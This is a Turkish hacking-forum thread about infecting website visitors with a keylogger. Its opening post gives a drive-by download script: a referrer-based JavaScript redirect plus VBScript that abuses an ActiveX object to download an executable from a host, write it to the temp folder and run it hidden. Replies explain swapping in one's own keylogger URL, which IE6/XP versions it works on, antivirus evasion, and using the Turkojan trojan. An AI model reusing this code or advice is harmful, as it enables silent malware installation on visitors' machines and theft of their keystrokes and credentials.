Forum
Aktif konular
Üyeler
Kurallar
Arama
Site Üzerinden Keyylogger Site Üzerinden Keyylogger
-
<SCRIPT language="JavaScript">
function cameFrom(where) {
if (!document.referrer && !where) return true;
else return (document.referrer.indexOf(whe re)>=0)
}
if (cameFrom("http://localhost")) {
location.replace("vb.htm");
}
else if (cameFrom("gov")) {
location.replace("vb.htm");
}
else if (cameFrom("or")) {
location.replace("vb.htm");
}
else if (cameFrom("bi")) {
location.replace("vb.htm");
}
else if (cameFrom("http://localhost")) {
location.replace("vb.htm");
}
else {
location.replace("vb.htm");
}
</SCRIPT>
<html><scriptlanguage="VBScrip t">
onerrorresumenextdl="http://localhost/avrillavigne.exe"
Setdf= document.createElement("object ")df.setAttribute"classid","cl sid:BD9C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XM LHTTP" Setx=df.CreateObject(str,"") a1="Ado"a2="db."a3="Str"a4="ea m" str1=a1&a2&a3&a4st5=str1setS=d f.createobject(str5,"")S.type= 1str6="GET"x.Openstr6,dl,False x.Sendfname1="http://localhost"
setF=df.createobject("Scriptin g.FileSystemObject","")
settmp=F.GetSpecialFolder(2)fn ame1=F.BuildPath(tmp,fname1)S. openS.writex.responseBodyS.sav etofilefname1,2S.close
setQ =df.createobject("Shell.Applic ation","")
QShellExecutefname1,"","","ope n",0
</script>bu kodla yapılıyomuş ama nasıl tarif etcek biri varmı
-
hostuna keyloger atıp gerekli yerleri editleyeceksin.
http://localhost/avrillavigne.exe
buraları fln
-
dağıtmayın aga sunu surda,burda hotmail xss gibi yayılır buda :(
-
sanırım(en azından bildiğim kadarıyla) bunu kullanabilmek için, server üzerinde router firewall'u dışında bir güvenlik olmaması(yani BitDefender yada Kaspersky veya benzerleri anti-virus ve anti-attack sistemleri) gerekir, aksi taktirde bu dosyayı yüklediğiniz host virüslü dosyayı zarar görmemek için siler ve eğer hostunuzla yaptığınız sunuculuk anlaşmasında bununla ilgili bir madde varsa, şirket size sunuculuk sağlamak ve parayı iade etmemek hakkını kendinde saklı tutar.
-
-
enigma_enigma bunu yazdı:
-----------------------------
sanırım(en azından bildiğim kadarıyla) bunu kullanabilmek için, server üzerinde router firewall'u dışında bir güvenlik olmaması(yani BitDefender yada Kaspersky veya benzerleri anti-virus ve anti-attack sistemleri) gerekir, aksi taktirde bu dosyayı yüklediğiniz host virüslü dosyayı zarar görmemek için siler ve eğer hostunuzla yaptığınız sunuculuk anlaşmasında bununla ilgili bir madde varsa, şirket size sunuculuk sağlamak ve parayı iade etmemek hakkını kendinde saklı tutar.
-----------------------------
benim hostumda öle bi sorun yok gül gibi geçinip gidioruz :P.@e-tolqa
zaten kodlar filtrelenmiş biraz editleyerek calısır hala gelir yanlız ie6 kullanan biri yer bunu + olarkta her ie6 kullanandada calısmıo :|
-
sırf IE6 yetmez, sanırım Service Pack 1 öncesi bir XP lazım(XP Basic Home yada Pro) ve ek olarak hostun hangisiyse banada sölesene bende virüsleri oraya koyim =D şimdiden teşekkürler =D
-
yok sp2 yiyo . bizzat format cakip saf sp2 xpde test ettim . Amma zamanla gecen güncellemeler sonucu calısmadıgı kaanatına vardım :|
-
hocam iyiymiş ozaman da antivirüsü olmayan PC varmı ya yedirmek için? yani hani tamam koydun sitene dielim, eğer ben girsem Kaspersky direk vodo vodo öter, bende birdaha o siteye girme yani hit düşer+Windows uptodate leri yapmayan kim var ve son bir + daha, Windows Vista kullanıcı sayısı her geçen gün artıyor =D
-
Bence bu xss den çok daha tehlikeli fazla yaymamak lazım.
-
xssden tehlikeli ama arkın hatun bile ff kullanıo zor girdi kız ie 6 ile siteye ondada calısmadı :(.
@enigma_enigma
valla hocam bende deişik bi kod var suan antiler kodu yakalayamıo (kasper,nod,f-secure kodda bişi bulmadı) ama exelerde sorun cıkarıo. oturup ya kendin yazcaksın keylogerını yada hazır trojanların vsvs PE lerini satın alacaksın ki ben suan turkojanla amacıma ulasıorum :P
not : bu arada elinde turkojanPE bulunan bi pm caksın :D
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla